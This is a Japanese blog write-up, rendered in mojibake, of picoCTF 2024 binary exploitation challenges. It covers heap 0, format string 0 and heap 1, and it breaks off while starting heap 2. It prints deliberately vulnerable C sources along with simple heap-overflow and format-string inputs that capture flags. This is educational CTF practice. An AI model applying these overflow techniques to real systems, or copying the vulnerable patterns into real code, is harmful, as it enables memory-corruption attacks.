å‰å›ž ã¯ã€picoCTF ã«ç™»éŒ²ã—ã¦ã€picoGymã®ã€ŒBeginner picoMini 2022ã€ã®å…¨13å•ã‚’ã‚„ã£ã¦ã¿ã¾ã—ãŸã€‚
今回ã¯ã€å¼•ã続ãã€picoCTF ã® picoCTF 2024 ã®ã†ã¡ã€Binary Exploitation ã¨ã„ã†ã‚«ãƒ†ã‚´ãƒªã®å…¨10å•ã‚’ã‚„ã£ã¦ã„ããŸã„ã¨æ€ã„ã¾ã™ã€‚Easy ㌠2å•ã€Medium ㌠6å•ã€Hard ㌠2å•ã§ã™ã€‚
ãã‚Œã§ã¯ã€ã‚„ã£ã¦ã„ãã¾ã™ã€‚
ã¯ã˜ã‚ã«
「セã‚ュリティã€ã®è¨˜äº‹ä¸€è¦§ã§ã™ã€‚良ã‹ã£ãŸã‚‰å‚考ã«ã—ã¦ãã ã•ã„。
ã‚»ã‚ュリティã®è¨˜äº‹ä¸€è¦§
picoCTF ã®å…¬å¼ã‚µã‚¤ãƒˆã¯ä»¥ä¸‹ã§ã™ã€‚英語ã®ã‚µã‚¤ãƒˆã§ã™ãŒã€ã‚·ãƒ³ãƒ—ルã§åˆ†ã‹ã‚Šã‚„ã™ã„ã®ã§å›°ã‚‰ãšã«é€²ã‚ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚
picoctf.com
ãã‚Œã§ã¯ã€ã‚„ã£ã¦ã„ãã¾ã™ã€‚
picoCTF 2024:Binary Exploitation
å•é¡Œã®ã‚¿ã‚¤ãƒˆãƒ«ã«ç•ªå·ãŒä»˜ã„ã¦ã‚‹å•é¡Œã«ã¤ã„ã¦ã¯ã€ç•ªå·ã®è‹¥ã„é †ã«ã‚„ã£ã¦ã„ãã¾ã™ã€‚
heap 0(50ãƒã‚¤ãƒ³ãƒˆï¼‰
Easy ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã‚‹ã¿ãŸã„ã§ã™ã€‚
heap 0å•é¡Œ
インスタンスを起動ã™ã‚‹ã¨ã€$ nc tethys.picoctf.net 54945 ã¨è¡¨ç¤ºã•ã‚Œã¾ã™ã€‚接続ã™ã‚‹ã¨ã€ãƒãƒ¼ã‚«ãƒ«ã®ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ã¨åŒã˜å‹•ä½œã‚’ã™ã‚‹ã‚ˆã†ã§ã™ã€‚ãƒãƒ¼ã‚«ãƒ«ã§ã„ã‚ã„ã‚試ã—ã¦ã€æº–å‚™ãŒå‡ºæ¥ãŸã‚‰ã€ã‚µãƒ¼ãƒã§ãƒ•ãƒ©ã‚°ã‚’å–ã‚Šã«è¡Œãã¨ã„ã†å½¢å¼ã®ã‚ˆã†ã§ã™ã€‚
$ nc tethys.picoctf.net 54945
Welcome to heap0!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x583e983c32b0 -> pico
+-------------+----------------+
[*] 0x583e983c32d0 -> bico
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 4
Looks like everything is still secure!
No flage for you :(
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 5
ã¾ãšã¯ã€ç°¡å˜ã«è¡¨å±¤è§£æžã‚’è¡Œã„ã¾ã™ã€‚メモリã®å®Ÿè¡ŒãŒç¦æ¢ã•ã‚Œã¦ã„ã‚‹ã“ã¨ã¨ã€ãƒ—ãƒã‚°ãƒ©ãƒ ã€ã‚¹ã‚¿ãƒƒã‚¯ã€ãƒ’ープã€å…±æœ‰ãƒ©ã‚¤ãƒ–ラリã®å…¨ã¦ãŒã‚¢ãƒ‰ãƒ¬ã‚¹ãŒãƒ©ãƒ³ãƒ€ãƒ 化ã•ã‚Œã¦ã„ã‚‹ã“ã¨ãŒåˆ†ã‹ã‚Šã¾ã—ãŸã€‚
$ file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2015ade3c2b89f5069cb8c54dd750d1b9849062d, for GNU/Linux 3.2.0, with debug_info, not stripped
$ checksec --file=chall
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 53 Symbols No 0 2 chall
続ã„ã¦ã€é™çš„解æžã¨ã—ã¦ã€ã‚½ãƒ¼ã‚¹ã‚³ãƒ¼ãƒ‰ã‚’眺ã‚ã¦ã¿ã¾ã™ã€‚
最åˆã«ã€ãƒ’ープ㌠2個確ä¿ã•ã‚Œã¦ã€ãã‚Œãžã‚Œã€"pico" 㨠"bico" ã¨ã„ã†æ–‡å—列ã§åˆæœŸåŒ–ã•ã‚Œã¦ã€"bico" ã®æ–¹ã®ãƒ’ープを "bico" 以外ã®å€¤ã«å‡ºæ¥ã‚‹ã¨ãƒ•ãƒ©ã‚°ãŒç²å¾—ã§ãるよã†ã§ã™ã€‚
メニュー㮠2. Write to buffer ã‚’é¸æŠžã™ã‚‹ã¨ã€"pico" ã§åˆæœŸåŒ–ã•ã‚ŒãŸæ–¹ã®ãƒ’ープã«æ›¸ãè¾¼ã¿ãŒè¡Œãˆã‚‹ã‚ˆã†ã§ã™ã€‚書ãè¾¼ã¿ã‚µã‚¤ã‚ºã¯ä»»æ„ã ã¨æ€ã†ã®ã§ã€ãƒ’ープãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã‚’èµ·ã“ã™ã“ã¨ãŒå‡ºæ¥ãã†ã§ã™ã€‚
2ã¤ã®ãƒ’ãƒ¼ãƒ—é ˜åŸŸã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’見るã¨ã€"pico" ã®æ–¹ãŒå°ã•ã„アドレスã«ãªã£ã¦ã„ã¦ã€"bico" ã¨ã®å·®ã¯ï¼ˆä»Šå›žã¯ï¼‰32byte ãªã®ã§ã€é©å½“ã«å¤§ããªã‚µã‚¤ã‚ºã‚’書ãè¾¼ã‚ã°ã€"bico" ã®æ–¹ã¾ã§æ›¸ãã¤ã¶ã›ãã†ã§ã™ã€‚
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define FLAGSIZE_MAX 64
#define INPUT_DATA_SIZE 5
#define SAFE_VAR_SIZE 5
int num_allocs;
char *safe_var;
char *input_data;
void check_win() {
if (strcmp(safe_var, "bico") != 0) {
printf("\nYOU WIN\n");
char buf[FLAGSIZE_MAX];
FILE *fd = fopen("flag.txt", "r");
fgets(buf, FLAGSIZE_MAX, fd);
printf("%s\n", buf);
fflush(stdout);
exit(0);
} else {
printf("Looks like everything is still secure!\n");
printf("\nNo flage for you :(\n");
fflush(stdout);
}
}
void print_menu() {
printf("\n1. Print Heap:\t\t(print the current state of the heap)"
"\n2. Write to buffer:\t(write to your own personal block of data "
"on the heap)"
"\n3. Print safe_var:\t(I'll even let you look at my variable on "
"the heap, "
"I'm confident it can't be modified)"
"\n4. Print Flag:\t\t(Try to print the flag, good luck)"
"\n5. Exit\n\nEnter your choice: ");
fflush(stdout);
}
void init() {
printf("\nWelcome to heap0!\n");
printf(
"I put my data on the heap so it should be safe from any tampering.\n");
printf("Since my data isn't on the stack I'll even let you write whatever "
"info you want to the heap, I already took care of using malloc for "
"you.\n\n");
fflush(stdout);
input_data = malloc(INPUT_DATA_SIZE);
strncpy(input_data, "pico", INPUT_DATA_SIZE);
safe_var = malloc(SAFE_VAR_SIZE);
strncpy(safe_var, "bico", SAFE_VAR_SIZE);
}
void write_buffer() {
printf("Data for buffer: ");
fflush(stdout);
scanf("%s", input_data);
}
void print_heap() {
printf("Heap State:\n");
printf("+-------------+----------------+\n");
printf("[*] Address -> Heap Data \n");
printf("+-------------+----------------+\n");
printf("[*] %p -> %s\n", input_data, input_data);
printf("+-------------+----------------+\n");
printf("[*] %p -> %s\n", safe_var, safe_var);
printf("+-------------+----------------+\n");
fflush(stdout);
}
int main(void) {
init();
print_heap();
int choice;
while (1) {
print_menu();
int rval = scanf("%d", &choice);
if (rval == EOF){
exit(0);
}
if (rval != 1) {
exit(0);
}
switch (choice) {
case 1:
print_heap();
break;
case 2:
write_buffer();
break;
case 3:
printf("\n\nTake a look at my variable: safe_var = %s\n\n",
safe_var);
fflush(stdout);
break;
case 4:
check_win();
break;
case 5:
return 0;
default:
printf("Invalid choice\n");
fflush(stdout);
}
}
}
ã§ã¯ã€å®Ÿéš›ã«ã‚„ã£ã¦ã¿ã¾ã™ã€‚"YOU WIN" ã¨å‡ºã¦ã„ã‚‹ã®ã§ã€ã“ã‚Œã§ãƒ•ãƒ©ã‚°ãŒå–ã‚Œãã†ã§ã™ã€‚
$ ./chall
Welcome to heap0!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x5599e5bec6b0 -> pico
+-------------+----------------+
[*] 0x5599e5bec6d0 -> bico
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 2
Data for buffer: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 1
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x5599e5bec6b0 -> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+-------------+----------------+
[*] 0x5599e5bec6d0 -> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 4
YOU WIN
Segmentation fault
次ã¯ã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ã‚’èµ·å‹•ã—ã¦ã€åŒã˜ã‚ˆã†ã«ã‚„ã£ã¦ã¿ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒå–ã‚Œã¾ã—ãŸã€‚
Easy ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-0)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-0.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã‚‹ã¿ãŸã„ã§ã™ã€‚
format string 0å•é¡Œ
インスタンスを起動ã™ã‚‹ã¨ã€$ nc mimas.picoctf.net 64090 ã¨è¡¨ç¤ºã•ã‚Œã¾ã™ã€‚接続ã™ã‚‹ã¨ã€ãƒãƒ¼ã‚«ãƒ«ã®ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ã¨åŒã˜å‹•ä½œã‚’ã™ã‚‹ã‚ˆã†ã§ã™ã€‚ãƒãƒ¼ã‚«ãƒ«ã§ã„ã‚ã„ã‚試ã—ã¦ã€æº–å‚™ãŒå‡ºæ¥ãŸã‚‰ã€ã‚µãƒ¼ãƒã§ãƒ•ãƒ©ã‚°ã‚’å–ã‚Šã«è¡Œãã¨ã„ã†å½¢å¼ã®ã‚ˆã†ã§ã™ã€‚
ãƒãƒ¼ã‚«ãƒ«ã§å‹•ä½œã•ã›ã‚‹å ´åˆã¯ã€ãƒ‡ãƒãƒƒã‚°ç”¨ã«ã€Œflag.txtã€ã¨ã„ã†ãƒ•ã‚¡ã‚¤ãƒ«ã‚’自分ã§ç”¨æ„ã™ã‚‹å¿…è¦ãŒã‚るよã†ã§ã™ã€‚ファイルã®ä¸èº«ã¯ã€ä¾‹ãˆã°ã€ã€ŒpicoCTF{FLAGFLAGFLAG}ã€ãªã©ã¨ã—ã¦ã€åŒã˜ãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªã«ç½®ãã¨å®Ÿè¡Œã§ãã¾ã—ãŸã€‚
$ nc mimas.picoctf.net 64090
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: ^C
ã¾ãšã¯ã€ç°¡å˜ã«è¡¨å±¤è§£æžã‚’è¡Œã„ã¾ã™ã€‚メモリã®å®Ÿè¡ŒãŒç¦æ¢ã•ã‚Œã¦ã„ã‚‹ã“ã¨ã¨ã€ã‚¹ã‚¿ãƒƒã‚¯ã€ãƒ’ープã€å…±æœ‰ãƒ©ã‚¤ãƒ–ラリã®å…¨ã¦ãŒã‚¢ãƒ‰ãƒ¬ã‚¹ãŒãƒ©ãƒ³ãƒ€ãƒ 化ã•ã‚Œã¦ã„ã¦ã€ãƒ—ãƒã‚°ãƒ©ãƒ ã¯å›ºå®šã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«é…ç½®ã•ã‚Œã‚‹ã“ã¨ãŒåˆ†ã‹ã‚Šã¾ã—ãŸã€‚
$ file format-string-0
format-string-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=73480d84a806aebddd86602609fcab2052c8fa13, for GNU/Linux 3.2.0, not stripped
$ checksec --file=format-string-0
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 50 Symbols No 0 2 format-string-0
続ã„ã¦ã€é™çš„解æžã¨ã—ã¦ã€ã‚½ãƒ¼ã‚¹ã‚³ãƒ¼ãƒ‰ã‚’眺ã‚ã¦ã¿ã¾ã™ã€‚
ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã¨ã—ã¦ã€ãƒ•ãƒ©ã‚°ã®é ˜åŸŸãŒ 64byte 確ä¿ã•ã‚Œã¦ã„ã¾ã™ã€‚2ã¤ã®ç•°ãªã‚‹ 3択ã®è³ªå•ãŒå‡ºé¡Œã•ã‚Œã¾ã™ã€‚入力ã™ã‚‹æ–‡å—列ã¯ã€3択ã®é¸æŠžè‚¢ã¨ strcmp ã§æ¯”較ã•ã‚Œã¦ã„ã¾ã™ã€‚
普通ã«ã‚„ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ã¯è¡¨ç¤ºã§ãã¾ã›ã‚“ãŒã€ã‚»ã‚°ãƒ¡ãƒ³ãƒ†ãƒ¼ã‚·ãƒ§ãƒ³ãƒ•ã‚©ãƒ¼ãƒ«ãƒˆã‚’発生ã•ã›ã‚‹ã“ã¨ãŒå‡ºæ¥ã‚‹ã¨ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œãã†ã§ã™ã€‚strcmp ã¯è„†å¼±æ€§ã®ã‚る関数ãªã®ã§ã€å¤§ããªæ–‡å—列を与ãˆã‚Œã°ã€ãƒ•ãƒ©ã‚°ã‚’表示ã§ããã†ã§ã™ã€‚
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 32
#define FLAGSIZE 64
char flag[FLAGSIZE];
void sigsegv_handler(int sig) {
printf("\n%s\n", flag);
fflush(stdout);
exit(1);
}
int on_menu(char *burger, char *menu[], int count) {
for (int i = 0; i < count; i++) {
if (strcmp(burger, menu[i]) == 0)
return 1;
}
return 0;
}
void serve_patrick();
void serve_bob();
int main(int argc, char **argv){
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag, FLAGSIZE, f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
serve_patrick();
return 0;
}
void serve_patrick() {
printf("%s %s\n%s\n%s %s\n%s",
"Welcome to our newly-opened burger place Pico 'n Patty!",
"Can you help the picky customers find their favorite burger?",
"Here comes the first customer Patrick who wants a giant bite.",
"Please choose from the following burgers:",
"Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
"Enter your recommendation: ");
fflush(stdout);
char choice1[BUFSIZE];
scanf("%s", choice1);
char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
if (!on_menu(choice1, menu1, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
} else {
printf("%s\n%s\n",
"Patrick is still hungry!",
"Try to serve him something of larger size!");
fflush(stdout);
}
}
}
void serve_bob() {
printf("\n%s %s\n%s %s\n%s %s\n%s",
"Good job! Patrick is happy!",
"Now can you serve the second customer?",
"Sponge Bob wants something outrageous that would break the shop",
"(better be served quick before the shop owner kicks you out!)",
"Please choose from the following burgers:",
"Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
"Enter your recommendation: ");
fflush(stdout);
char choice2[BUFSIZE];
scanf("%s", choice2);
char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
if (!on_menu(choice2, menu2, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
printf(choice2);
fflush(stdout);
}
}
ã§ã¯ã€å®Ÿéš›ã«ã‚„ã£ã¦ã¿ã¾ã™ã€‚自分ã§ç”¨æ„ã—ãŸãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¦ã„ã‚‹ã®ã§ã€ã“ã‚Œã§è‰¯ã•ãã†ã§ã™ã€‚
$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
There is no such burger yet!
picoCTF{FLAGFLAGFLAG}
次ã¯ã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ã‚’èµ·å‹•ã—ã¦ã€åŒã˜ã‚ˆã†ã«ã‚„ã£ã¦ã¿ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒå–ã‚Œã¾ã—ãŸã€‚
heap 1(100ãƒã‚¤ãƒ³ãƒˆï¼‰
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚上ã®ã€Œheap 0ã€ã¨åŒã˜ãƒ•ã‚¡ã‚¤ãƒ«åã§ã™ã€‚別ã®ãƒ•ã‚¡ã‚¤ãƒ«åã«ã—ã¦ã»ã—ã‹ã£ãŸã§ã™ï¼ˆç¬‘)。ã‚ã¨ã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã‚‹ã¿ãŸã„ã§ã™ã€‚
heap 1å•é¡Œ
フォルダã§åˆ†ã‘ãŸã®ã§ã€ã¤ã„ã§ã«ã€ã‚½ãƒ¼ã‚¹å·®åˆ†ã‚’見ã¾ã™ã€‚ã‚ã¡ã‚ƒãã¡ã‚ƒä¼¼ã¦ã¦ã€é•ã„ã¯ã€ã»ã¨ã‚“ã©ä¸€ã‹æ‰€ã ã‘ã§ã™ã€‚
「heap 0ã€ã§ã¯ã€safe_var ã¨ã„ㆠ5byte ã®é…列ãŒã€"bico" ã¨ã„ã†æ–‡å—列ã§åˆæœŸåŒ–ã•ã‚Œã¦ã„ã¦ã€ãã‚Œã‚’ç ´å£Šã—ã¦ã€"bico" ã§ã¯ãªã„æ–‡å—列ã«ã™ã‚Œã°ãƒ•ãƒ©ã‚°ãŒå–ã‚Œã¾ã—ãŸã€‚今回ã®ã€Œheap 1ã€ã§ã¯ã€save_var ã‚’ "bico" ã‹ã‚‰ "pico" ã«å¤‰æ›´ã™ã‚Œã°ãƒ•ãƒ©ã‚°ãŒå–れるよã†ã§ã™ã€‚
$ diff heap0/chall.c heap1/chall.c
--- heap0/chall.c 2024-10-03 22:08:46.030311000 +0900
+++ heap1/chall.c 2024-10-04 21:45:05.145239500 +0900
@@ -13,7 +13,7 @@
char *input_data;
void check_win() {
- if (strcmp(safe_var, "bico") != 0) {
+ if (!strcmp(safe_var, "pico")) {
printf("\nYOU WIN\n");
// Print flag
入力ã§ãã‚‹ã®ã¯ã€"pico" ã§åˆæœŸåŒ–ã•ã‚ŒãŸ input_data ã¨ã„ㆠ5byte ã®é…列ãªã®ã§ã€ãƒ’ープãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã§ã€32byte 後方ã«ã‚ã‚‹ safe_var を書ãæ›ãˆã‚Œã°ã„ã„ã‚ã‘ã§ã™ã€‚å˜ç´”ã«ã€32byteã®ä»»æ„ã®æ–‡å—列 + "pico" ã§ã„ã„æ°—ãŒã—ã¾ã™ã€‚ã‚„ã£ã¦ã¿ã¾ã™ã€‚
フラグãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€‚本æ¥ã¯ã€input_data 㨠safe_var ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’å–å¾—ã—ã¦ã€ãã®å·®åˆ†ã‚’求ã‚ã¦ãŠã„ã¦ã€ä»»æ„ã®æ–‡å—列ã®æ•°ã‚’調整ã—ãŸæ–¹ãŒã„ã„ã‹ã‚‚ã—ã‚Œã¾ã›ã‚“ãŒã€malloc関数ã¯å¸¸ã«åŒã˜å‹•ãã‚’ã™ã‚‹ã¯ãšãªã®ã§ã€ã“ã‚Œã§å¤§ä¸ˆå¤«ã ã¨æ€ã„ã¾ã™ã€‚
$ heap1/chall
Welcome to heap1!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x556e79fc46b0 -> pico
+-------------+----------------+
[*] 0x556e79fc46d0 -> bico
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 2
Data for buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: 4
YOU WIN
picoCTF{FLAGFLAGFLAG}
次ã¯ã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ã‚’èµ·å‹•ã—ã¦ã€åŒã˜ã‚ˆã†ã«ã‚„ã£ã¦ã¿ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒå–ã‚Œã¾ã—ãŸã€‚
heap 2(200ãƒã‚¤ãƒ³ãƒˆï¼‰
ã“ã®ã¾ã¾ heap ã®å•é¡Œã‚’ã‚„ã£ã¦ã„ãã¾ã™ã€‚
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆchall.c)㌠1ã¤ãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚åŒã˜ãƒ•ã‚¡ã‚¤ãƒ«åã§ã™ã€‚インスタンス(サーãƒï¼‰ã‚‚èµ·å‹•ã§ãã¾ã™ã€‚
heap 2å•é¡Œ
ソースを見るã¨ã€ä¼¼ã¦ã¾ã™ãŒã€çµæ§‹å·®åˆ†ãŒã‚ã‚Šã¾ã™ã€‚変数å㌠safe_var ã‹ã‚‰ x ã«å¤‰ã‚ã£ã¦ã„ã¾ã™ã€‚
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define FLAGSIZE_MAX 64
int num_allocs;
char *x;
char *input_data;
void win() {
char buf[FLAGSIZE_MAX];
FILE *fd = fopen("flag.txt", "r");
fgets(buf, FLAGSIZE_MAX, fd);
printf("%s\n", buf);
fflush(stdout);
exit(0);
}
void check_win() { ((void (*)())*(int*)x)(); }
void print_menu() {
printf("\n1. Print Heap\n2. Write to buffer\n3. Print x\n4. Print Flag\n5. "
"Exit\n\nEnter your choice: ");
fflush(stdout);
}
void init() {
printf("\nI have a function, I sometimes like to call it, maybe you should change it\n");
fflush(stdout);
input_data = malloc(5);
strncpy(input_data, "pico", 5);
x = malloc(5);
strncpy(x, "bico", 5);
}
void write_buffer() {
printf("Data for buffer: ");
fflush(stdout);
scanf("%s", input_data);
}
void print_heap() {
printf("[*] Address -> Value \n");
printf("+-------------+-----------+\n");
printf("[*] %p -> %s\n", input_data, input_data);
printf("+-------------+-----------+\n");
printf("[*] %p -> %s\n", x, x);
fflush(stdout);
}
int main(void) {
init();
int choice;
while (1) {
print_menu();
if (scanf("%d", &choice) != 1) exit(0);
switch (choice) {
case 1:
print_heap();
break;
case 2:
write_buffer();
break;
case 3:
printf("\n\nx = %s\n\n", x);
fflush(stdout);
break;
case 4:
check_win();
break;
case 5:
return 0;
default:
printf("Invalid choice\n");
fflush(stdout);
}
}
}
æ°—ã«ãªã‚‹ã¨ã“ã‚ã¯ã€ãƒ•ãƒ©ã‚°ã‚’表示ã™ã‚‹ win関数ãŒã©ã“ã‹ã‚‰ã‚‚呼ã°ã‚Œã¦ã„ãªã„ã“ã¨ã¨ã€check_win関数ãŒã€ä»¥ä¸‹ã®ã‚ˆã†ã«ãªã£ã¦ã„ã‚‹ã¨ã“ã‚ã§ã™ã€‚
ã“ã‚Œã¯ã€é–¢æ•°ãƒã‚¤ãƒ³ã‚¿ã®ã‚ャスト((void (*)()))ãŒå…¥ã£ãŸå½¢ã§ã€x ã«ã€win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒå…¥ã‚‹ã‚ˆã†ã«ã—ã¦ã‚ã’ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œãã†ã§ã™ã€‚
void check_win() { ((void (*)())*(int*)x)(); }
一度実行ã—ã¦ã¿ã¾ã™ã€‚
